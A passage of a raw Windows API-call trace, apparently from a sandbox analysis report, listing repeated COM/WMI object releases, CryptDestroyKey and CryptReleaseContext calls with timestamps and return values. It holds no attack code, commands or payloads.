returned 0x0 [0196.133] WbemLocator:IUnknown:Release (This=0x6027650) returned 0x1 [0196.134] WbemLocator:IUnknown:Release (This=0x6027650) returned 0x0 [0196.134] CryptDestroyKey (hKey=0xb7f5d0) returned 1 [0196.134] CryptReleaseContext (hProv=0x66bbb70, dwFlags=0x0) returned 1 [0196.134] CryptReleaseContext (hProv=0x66bbb70, dwFlags=0x0) returned 1 [0196.375] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0196.375] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0196.375] WbemLocator:IUnknown:Release (This=0x60277d0) returned 0x1 [0196.375] WbemLocator:IUnknown:Release (This=0x60277d0) returned 0x0 [0196.375] CryptDestroyKey (hKey=0xb7f610) returned 1 [0196.375] CryptReleaseContext (hProv=0x66bbd08, dwFlags=0x0) returned 1 [0196.375] CryptReleaseContext (hProv=0x66bbd08, dwFlags=0x0) returned 1 [0196.376] CryptDestroyKey (hKey=0xb7f4d0) returned 1 [0196.376] CryptReleaseContext (hProv=0x66bb598, dwFlags=0x0) returned 1 [0196.376] CryptReleaseContext (hProv=0x66bb598, dwFlags=0x0) returned 1 [0197.015] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0197.015] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0197.015] WbemLocator:IUnknown:Release (This=0x60271c0) returned 0x1 [0197.015] WbemLocator:IUnknown:Release (This=0x60271c0) returned 0x0 [0197.015] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0197.015] WbemLocator:IUnknown:Release (This=0x6027180) returned 0x1 [0197.015] WbemLocator:IUnknown:Release (This=0x6027180) returned 0x0 [0197.015] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0197.015] WbemLocator:IUnknown:Release (This=0x6027900) returned 0x1 [0197.015] WbemLocator:IUnknown:Release (This=0x6027900) returned 0x0 [0197.015] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0197.015] WbemLocator:IUnknown:Release (This=0x6027650) returned 0x1 [0197.015] WbemLocator:IUnknown:Release (This=0x6027650) returned 0x0 [0197.015] IUnknown:Release (This=0x6028b10) returned 0x0 [0197.015] CryptDestroyKey (hKey=0xb7f4d0) returned 1 [0197.015] CryptReleaseContext (hProv=0x66bb510, dwFlags=0x0) returned 1 [0197.015] CryptReleaseContext (hProv=0x66bb510, dwFlags=0x0) returned 1 [0197.016] CryptDestroyKey (hKey=0xb7fc10) returned 1 [0197.016] CryptReleaseContext (hProv=0x66bbb70, dwFlags=0x0) returned 1 [0197.016] CryptReleaseContext (hProv=0x66bbb70, dwFlags=0x0) returned 1 [0197.016] CryptDestroyKey (hKey=0xb7f9d0) returned 1 [0197.016] CryptReleaseContext (hProv=0x66bb950, dwFlags=0x0) returned 1 [0197.016] CryptReleaseContext (hProv=0x66bb950, dwFlags=0x0) returned 1 [0197.768] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0197.768] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0197.769] WbemDefPath:IUnknown:Release (This=0x60309b0) returned 0x1 [0197.769] WbemDefPath:IUnknown:Release (This=0x60309b0) returned 0x0 [0197.769] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0197.769] WbemDefPath:IUnknown:Release (This=0x6030a20) returned 0x1 [0197.769] WbemDefPath:IUnknown:Release (This=0x6030a20) returned 0x0 [0197.769] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0197.769] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0197.769] WbemLocator:IUnknown:Release (This=0xb5af74) returned 0x1 [0197.769] WbemLocator:IUnknown:Release (This=0x60334d4) returned 0x0 [0197.819] IUnknown:Release (This=0x6028648) returned 0x0 [0197.819] IUnknown:Release (This=0x6028b10) returned 0x0 [0197.819] IUnknown:Release (This=0x6028180) returned 0x0 [0197.820] CryptDestroyKey (hKey=0xb7fb10) returned 1 [0197.820] CryptReleaseContext (hProv=0x66bb950, dwFlags=0x0) returned 1 [0197.820] CryptReleaseContext (hProv=0x66bb950, dwFlags=0x0) returned 1 [0198.263] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0198.263] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0198.263] WbemDefPath:IUnknown:Release (This=0x6031510) returned 0x1 [0198.263] WbemDefPath:IUnknown:Release (This=0x6031510) returned 0x0 [0198.263] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0198.263] WbemDefPath:IUnknown:Release (This=0x60314a0) returned 0x1 [0198.263] WbemDefPath:IUnknown:Release (This=0x60314a0) returned 0x0 [0198.263] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0198.263] WbemDefPath:IUnknown:Release (This=0x6031430) returned 0x1 [0198.263] WbemDefPath:IUnknown:Release (This=0x6031430) returned 0x0 [0198.264] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0198.264] WbemDefPath:IUnknown:Release (This=0x60313c0) returned 0x1 [0198.264] WbemDefPath:IUnknown:Release (This=0x60313c0) returned 0x0 [0198.264] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0198.264] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x1 [0198.264] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x0 [0198.264] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0198.264] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x1 [0198.264] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x0 [0198.264] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0198.264] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0198.264] WbemLocator:IUnknown:Release (This=0x60271d0) returned 0x1 [0198.264] WbemLocator:IUnknown:Release (This=0x60271d0) returned 0x0 [0198.264] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0198.264] WbemLocator:IUnknown:Release (This=0xb5b154) returned 0x1 [0198.264] WbemLocator:IUnknown:Release (This=0x6033584) returned 0x0 [0198.268] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0198.268] WbemLocator:IUnknown:Release (This=0x6027910) returned 0x1 [0198.268] WbemLocator:IUnknown:Release (This=0x6027910) returned 0x0 [0198.268] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0198.268] WbemLocator:IUnknown:Release (This=0xb5b604) returned 0x1 [0198.268] WbemLocator:IUnknown:Release (This=0x6033634) returned 0x0 [0198.268] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0198.268] WbemLocator:IUnknown:Release (This=0xb5b514) returned 0x1 [0198.268] WbemLocator:IUnknown:Release (This=0x60335dc) returned 0x0 [0198.268] IUnknown:Release (This=0x6028180) returned 0x0 [0198.269] CryptDestroyKey (hKey=0xb7f850) returned 1 [0198.269] CryptReleaseContext (hProv=0x66bc148, dwFlags=0x0) returned 1 [0198.269] CryptReleaseContext (hProv=0x66bc148, dwFlags=0x0) returned 1 [0199.526] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0199.526] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0199.526] WbemLocator:IUnknown:Release (This=0x6027650) returned 0x1 [0199.526] WbemLocator:IUnknown:Release (This=0x6027650) returned 0x0 [0199.526] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0199.526] WbemLocator:IUnknown:Release (This=0x6027950) returned 0x1 [0199.527] WbemLocator:IUnknown:Release (This=0x6027950) returned 0x0 [0199.527] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0199.527] WbemLocator:IUnknown:Release (This=0x6027590) returned 0x1 [0199.527] WbemLocator:IUnknown:Release (This=0x6027590) returned 0x0 [0199.527] IUnknown:Release (This=0x6028648) returned 0x0 [0199.527] IUnknown:Release (This=0x6027cb8) returned 0x0 [0199.527] IUnknown:Release (This=0x6027b20) returned 0x0 [0199.527] CryptDestroyKey (hKey=0xb7f850) returned 1 [0199.527] CryptReleaseContext (hProv=0x66bc258, dwFlags=0x0) returned 1 [0199.527] CryptReleaseContext (hProv=0x66bc258, dwFlags=0x0) returned 1 [0199.528] CryptDestroyKey (hKey=0xb7f9d0) returned 1 [0199.528] CryptReleaseContext (hProv=0x66bbb70, dwFlags=0x0) returned 1 [0199.528] CryptReleaseContext (hProv=0x66bbb70, dwFlags=0x0) returned 1 [0199.528] CryptDestroyKey (hKey=0xb7f1d0) returned 1 [0199.528] CryptReleaseContext (hProv=0x66bb950, dwFlags=0x0) returned 1 [0199.528] CryptReleaseContext (hProv=0x66bb950, dwFlags=0x0) returned 1 [0200.635] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0200.635] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0200.635] WbemDefPath:IUnknown:Release (This=0x6031510) returned 0x1 [0200.635] WbemDefPath:IUnknown:Release (This=0x6031510) returned 0x0 [0200.635] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0200.635] WbemDefPath:IUnknown:Release (This=0x60314a0) returned 0x1 [0200.635] WbemDefPath:IUnknown:Release (This=0x60314a0) returned 0x0 [0200.635] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0200.635] WbemDefPath:IUnknown:Release (This=0x6031430) returned 0x1 [0200.635] WbemDefPath:IUnknown:Release (This=0x6031430) returned 0x0 [0200.635] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0200.635] WbemDefPath:IUnknown:Release (This=0x60313c0) returned 0x1 [0200.635] WbemDefPath:IUnknown:Release (This=0x60313c0) returned 0x0 [0200.635] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0200.635] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x1 [0200.635] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x0 [0200.636] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0200.636] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x1 [0200.636] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x0 [0200.636] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0200.636] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0200.636] WbemLocator:IUnknown:Release (This=0x6027180) returned 0x1 [0200.636] WbemLocator:IUnknown:Release (This=0x6027180) returned 0x0 [0200.636] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0200.636] WbemLocator:IUnknown:Release (This=0xb5b244) returned 0x1 [0200.636] WbemLocator:IUnknown:Release (This=0x60336e4) returned 0x0 [0200.651] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0200.651] WbemLocator:IUnknown:Release (This=0xb5b424) returned 0x1 [0200.651] WbemLocator:IUnknown:Release (This=0x60334d4) returned 0x0 [0200.652] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0200.652] WbemLocator:IUnknown:Release (This=0x60271e0) returned 0x1 [0200.652] WbemLocator:IUnknown:Release (This=0x60271e0) returned 0x0 [0200.652] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0200.652] WbemLocator:IUnknown:Release (This=0xb5af74) returned 0x1 [0200.652] WbemLocator:IUnknown:Release (This=0x6033584) returned 0x0 [0200.652] IUnknown:Release (This=0x6027cb8) returned 0x0 [0200.652] IUnknown:Release (This=0x6027b20) returned 0x0 [0200.653] CryptDestroyKey (hKey=0xb7f850) returned 1 [0200.653] CryptReleaseContext (hProv=0x66bbb70, dwFlags=0x0) returned 1 [0200.653] CryptReleaseContext (hProv=0x66bbb70, dwFlags=0x0) returned 1 [0200.653] CryptDestroyKey (hKey=0xb7f1d0) returned 1 [0200.653] CryptReleaseContext (hProv=0xbe00b8, dwFlags=0x0) returned 1 [0200.654] CryptReleaseContext (hProv=0xbe00b8, dwFlags=0x0) returned 1 [0201.524] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0201.524] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0201.524] WbemDefPath:IUnknown:Release (This=0x6029f80) returned 0x1 [0201.524] WbemDefPath:IUnknown:Release (This=0x6029f80) returned 0x0 [0201.524] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0201.524] WbemDefPath:IUnknown:Release (This=0x6029f10) returned 0x1 [0201.524] WbemDefPath:IUnknown:Release (This=0x6029f10) returned 0x0 [0201.524] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0201.524] WbemDefPath:IUnknown:Release (This=0x6029ea0) returned 0x1 [0201.524] WbemDefPath:IUnknown:Release (This=0x6029ea0) returned 0x0 [0201.524] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0201.524] WbemDefPath:IUnknown:Release (This=0x6029e30) returned 0x1 [0201.524] WbemDefPath:IUnknown:Release (This=0x6029e30) returned 0x0 [0201.524] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0201.524] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0201.524] WbemLocator:IUnknown:Release (This=0xb5bba4) returned 0x1 [0201.524] WbemLocator:IUnknown:Release (This=0x6033794) returned 0x0 [0201.758] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0201.758] WbemLocator:IUnknown:Release (This=0xb5b9c4) returned 0x1 [0201.758] WbemLocator:IUnknown:Release (This=0x603373c) returned 0x0 [0201.768] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0201.768] WbemLocator:IUnknown:Release (This=0x60271f0) returned 0x1 [0201.768] WbemLocator:IUnknown:Release (This=0x60271f0) returned 0x0 [0201.768] IUnknown:Release (This=0x6027b20) returned 0x0 [0201.768] CryptReleaseContext (hProv=0xbdf838, dwFlags=0x0) returned 1 [0201.769] CryptDestroyKey (hKey=0xb7f1d0) returned 1 [0201.769] CryptReleaseContext (hProv=0xbdf838, dwFlags=0x0) returned 1 [0201.862] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0201.862] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0201.862] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x1 [0201.862] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x0 [0201.862] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0201.862] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x1 [0201.862] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x0 [0201.862] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0201.862] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0201.862] WbemLocator:IUnknown:Release (This=0x60276e0) returned 0x1 [0201.862] WbemLocator:IUnknown:Release (This=0x60276e0) returned 0x0 [0201.862] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0201.862] WbemLocator:IUnknown:Release (This=0x6027200) returned 0x1 [0201.862] WbemLocator:IUnknown:Release (This=0x6027200) returned 0x0 [0201.862] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0201.862] WbemLocator:IUnknown:Release (This=0x6027910) returned 0x1 [0201.862] WbemLocator:IUnknown:Release (This=0x6027910) returned 0x0 [0201.862] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0201.862] WbemLocator:IUnknown:Release (This=0xb5b424) returned 0x1 [0201.862] WbemLocator:IUnknown:Release (This=0x6033584) returned 0x0 [0201.984] SleepEx (dwMilliseconds=0x5, bAlertable=0) returned 0x0 [0201.996] SleepEx (dwMilliseconds=0x5, bAlertable=0) returned 0x0 [0202.006] CryptDestroyKey (hKey=0xb7fbd0) returned 1 [0202.007] CryptReleaseContext (hProv=0xbe0690, dwFlags=0x0) returned 1 [0202.007] CryptReleaseContext (hProv=0xbe0690, dwFlags=0x0) returned 1 [0202.007] CryptReleaseContext (hProv=0xbe00b8, dwFlags=0x0) returned 1 [0202.007] CryptDestroyKey (hKey=0xb7fa50) returned 1 [0202.007] CryptReleaseContext (hProv=0xbe00b8, dwFlags=0x0) returned 1 [0202.007] CryptDestroyKey (hKey=0xb7fc50) returned 1 [0202.008] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0202.008] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0202.662] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0202.662] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0202.662] WbemLocator:IUnknown:Release (This=0x6027230) returned 0x1 [0202.662] WbemLocator:IUnknown:Release (This=0x6027230) returned 0x0 [0202.663] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0202.663] WbemLocator:IUnknown:Release (This=0x60276e0) returned 0x1 [0202.663] WbemLocator:IUnknown:Release (This=0x60276e0) returned 0x0 [0202.663] IUnknown:Release (This=0x6027b20) returned 0x0 [0202.663] CryptDestroyKey (hKey=0xb7f4d0) returned 1 [0202.663] CryptReleaseContext (hProv=0xbdfe98, dwFlags=0x0) returned 1 [0202.664] CryptDestroyKey (hKey=0xb7f110) returned 1 [0202.664] CryptReleaseContext (hProv=0x66bbd08, dwFlags=0x0) returned 1 [0202.664] CryptReleaseContext (hProv=0x66bbd08, dwFlags=0x0) returned 1 [0202.664] CryptReleaseContext (hProv=0xbdfe98, dwFlags=0x0) returned 1 [0203.434] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0203.435] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0203.435] WbemLocator:IUnknown:Release (This=0x6027270) returned 0x1 [0203.435] WbemLocator:IUnknown:Release (This=0x6027270) returned 0x0 [0203.435] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0203.435] WbemLocator:IUnknown:Release (This=0xb5b424) returned 0x1 [0203.435] WbemLocator:IUnknown:Release (This=0x6033584) returned 0x0 [0203.568] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0203.569] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0203.569] WbemDefPath:IUnknown:Release (This=0x6029f80) returned 0x1 [0203.569] WbemDefPath:IUnknown:Release (This=0x6029f80) returned 0x0 [0203.569] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0203.569] WbemDefPath:IUnknown:Release (This=0x6029f10) returned 0x1 [0203.569] WbemDefPath:IUnknown:Release (This=0x6029f10) returned 0x0 [0203.569] IUnknown:Release (This=0x60284b0) returned 0x0 [0203.569] IUnknown:Release (This=0x6027cb8) returned 0x0 [0203.569] IUnknown:Release (This=0x6027b20) returned 0x0 [0203.569] IUnknown:Release (This=0x6028648) returned 0x0 [0203.570] CryptDestroyKey (hKey=0xb7f510) returned 1 [0203.570] CryptReleaseContext (hProv=0xbe00b8, dwFlags=0x0) returned 1 [0203.570] CryptReleaseContext (hProv=0xbe00b8, dwFlags=0x0) returned 1 [0204.180] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0204.180] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0204.180] WbemDefPath:IUnknown:Release (This=0x6030d30) returned 0x1 [0204.180] WbemDefPath:IUnknown:Release (This=0x6030d30) returned 0x0 [0204.180] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0204.180] WbemDefPath:IUnknown:Release (This=0x6031190) returned 0x1 [0204.180] WbemDefPath:IUnknown:Release (This=0x6031190) returned 0x0 [0204.180] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0204.180] WbemDefPath:IUnknown:Release (This=0x6029ff0) returned 0x1 [0204.180] WbemDefPath:IUnknown:Release (This=0x6029ff0) returned 0x0 [0204.180] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0204.180] WbemDefPath:IUnknown:Release (This=0x6031430) returned 0x1 [0204.180] WbemDefPath:IUnknown:Release (This=0x6031430) returned 0x0 [0204.180] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0204.180] WbemDefPath:IUnknown:Release (This=0x60313c0) returned 0x1 [0204.180] WbemDefPath:IUnknown:Release (This=0x60313c0) returned 0x0 [0204.180] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0204.180] WbemDefPath:IUnknown:Release (This=0x6029ce0) returned 0x1 [0204.180] WbemDefPath:IUnknown:Release (This=0x6029ce0) returned 0x0 [0204.180] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0204.180] WbemDefPath:IUnknown:Release (This=0x6029c70) returned 0x1 [0204.180] WbemDefPath:IUnknown:Release (This=0x6029c70) returned 0x0 [0204.180] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0204.180] WbemDefPath:IUnknown:Release (This=0x602a060) returned 0x1 [0204.180] WbemDefPath:IUnknown:Release (This=0x602a060) returned 0x0 [0204.180] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0204.180] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x1 [0204.181] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x0 [0204.181] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0204.181] WbemDefPath:IUnknown:Release (This=0x6029ea0) returned 0x1 [0204.181] WbemDefPath:IUnknown:Release (This=0x6029ea0) returned 0x0 [0204.181] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0204.181] WbemDefPath:IUnknown:Release (This=0x6029e30) returned 0x1 [0204.181] WbemDefPath:IUnknown:Release (This=0x6029e30) returned 0x0 [0204.181] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0204.181] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x1 [0204.181] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x0 [0204.181] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0204.181] WbemDefPath:IUnknown:Release (This=0x6030a90) returned 0x1 [0204.181] WbemDefPath:IUnknown:Release (This=0x6030a90) returned 0x0 [0204.181] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0204.181] WbemDefPath:IUnknown:Release (This=0x6030860) returned 0x1 [0204.181] WbemDefPath:IUnknown:Release (This=0x6030860) returned 0x0 [0204.181] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0204.181] WbemDefPath:IUnknown:Release (This=0x60308d0) returned 0x1 [0204.181] WbemDefPath:IUnknown:Release (This=0x60308d0) returned 0x0 [0204.181] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0204.181] WbemDefPath:IUnknown:Release (This=0x6030b70) returned 0x1 [0204.181] WbemDefPath:IUnknown:Release (This=0x6030b70) returned 0x0 [0204.181] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0204.181] WbemDefPath:IUnknown:Release (This=0x6030be0) returned 0x1 [0204.181] WbemDefPath:IUnknown:Release (This=0x6030be0) returned 0x0 [0204.181] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0204.182] WbemDefPath:IUnknown:Release (This=0x6030c50) returned 0x1 [0204.182] WbemDefPath:IUnknown:Release (This=0x6030c50) returned 0x0 [0204.182] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0204.182] WbemDefPath:IUnknown:Release (This=0x6030cc0) returned 0x1 [0204.182] WbemDefPath:IUnknown:Release (This=0x6030cc0) returned 0x0 [0204.182] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0204.182] WbemDefPath:IUnknown:Release (This=0x6031120) returned 0x1 [0204.182] WbemDefPath:IUnknown:Release (This=0x6031120) returned 0x0 [0204.182] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0204.182] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0204.182] WbemLocator:IUnknown:Release (This=0x6027200) returned 0x1 [0204.182] WbemLocator:IUnknown:Release (This=0x6027200) returned 0x0 [0204.182] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0204.182] WbemLocator:IUnknown:Release (This=0x66b47cc) returned 0x1 [0204.182] WbemLocator:IUnknown:Release (This=0x60336e4) returned 0x0 [0204.297] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0204.297] WbemLocator:IUnknown:Release (This=0x66b46dc) returned 0x1 [0204.297] WbemLocator:IUnknown:Release (This=0x60334d4) returned 0x0 [0204.396] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0204.396] WbemLocator:IUnknown:Release (This=0x60277d0) returned 0x1 [0204.396] WbemLocator:IUnknown:Release (This=0x60277d0) returned 0x0 [0204.396] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0204.396] WbemLocator:IUnknown:Release (This=0xb5bc94) returned 0x1 [0204.396] WbemLocator:IUnknown:Release (This=0x6033794) returned 0x0 [0204.397] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0204.397] WbemLocator:IUnknown:Release (This=0xb5b514) returned 0x1 [0204.397] WbemLocator:IUnknown:Release (This=0x603373c) returned 0x0 [0204.397] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0204.397] WbemLocator:IUnknown:Release (This=0xb5bd84) returned 0x1 [0204.397] WbemLocator:IUnknown:Release (This=0x603368c) returned 0x0 [0204.399] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0204.399] WbemLocator:IUnknown:Release (This=0xb5b6f4) returned 0x1 [0204.399] WbemLocator:IUnknown:Release (This=0x6033164) returned 0x0 [0204.401] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0204.401] WbemLocator:IUnknown:Release (This=0xb5ae84) returned 0x1 [0204.401] WbemLocator:IUnknown:Release (This=0x6033214) returned 0x0 [0204.401] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0204.401] WbemLocator:IUnknown:Release (This=0xb5ad94) returned 0x1 [0204.401] WbemLocator:IUnknown:Release (This=0x60331bc) returned 0x0 [0204.402] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0204.402] WbemLocator:IUnknown:Release (This=0xb5bf64) returned 0x1 [0204.402] WbemLocator:IUnknown:Release (This=0x603331c) returned 0x0 [0204.498] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0204.499] WbemLocator:IUnknown:Release (This=0xb5aca4) returned 0x1 [0204.499] WbemLocator:IUnknown:Release (This=0x60332c4) returned 0x0 [0204.551] IUnknown:Release (This=0x60287e0) returned 0x0 [0204.551] IUnknown:Release (This=0x6027e50) returned 0x0 [0204.551] IUnknown:Release (This=0x6028180) returned 0x0 [0204.551] IUnknown:Release (This=0x6028b10) returned 0x0 [0204.552] IUnknown:Release (This=0x6027fe8) returned 0x0 [0204.552] CryptDestroyKey (hKey=0xb7fa10) returned 1 [0204.552] CryptReleaseContext (hProv=0xbdf7b0, dwFlags=0x0) returned 1 [0204.552] CryptReleaseContext (hProv=0xbdf7b0, dwFlags=0x0) returned 1 [0204.553] CryptDestroyKey (hKey=0xb7f090) returned 1 [0204.553] CryptReleaseContext (hProv=0x66ba630, dwFlags=0x0) returned 1 [0204.553] CryptReleaseContext (hProv=0x66ba630, dwFlags=0x0) returned 1 [0204.553] CryptDestroyKey (hKey=0xb7f1d0) returned 1 [0204.553] CryptReleaseContext (hProv=0xbdf6a0, dwFlags=0x0) returned 1 